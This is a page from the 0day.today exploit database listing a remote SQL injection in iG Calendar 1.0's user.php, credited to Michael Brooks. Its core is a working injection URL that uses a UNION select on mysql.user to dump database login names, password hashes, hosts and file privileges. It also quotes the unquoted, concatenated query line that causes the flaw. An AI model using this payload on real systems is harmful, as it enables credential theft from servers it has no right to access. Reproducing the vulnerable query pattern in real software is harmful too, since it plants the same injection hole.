[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

iG Calendar 1.0 (user.php id variable) Remote SQL Injection Vulnerability

Author
Michael Brooks
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1364
Category
web applications
Date add
05-01-2007
Platform
unsorted
=========================================================================
iG Calendar 1.0 (user.php id variable) Remote SQL Injection Vulnerability
=========================================================================



SQL Injection in ig-Calendar.  This works regardless of magic_quotes_gpc!
Dumps mysql login informaion:
http://127.0.0.1/ig-calendar/user.php?id=999%20union%20select%201,User,Password,Host,File_priv,0%20from%20mysql.user
./user.php line 52:
$query = 'SELECT * FROM users WHERE id='.$id;
Should have used quote marks.

Vendor's page:http://www.igeneric.co.uk


By Michael Brooks.  




#  0day.today [2024-12-23]  #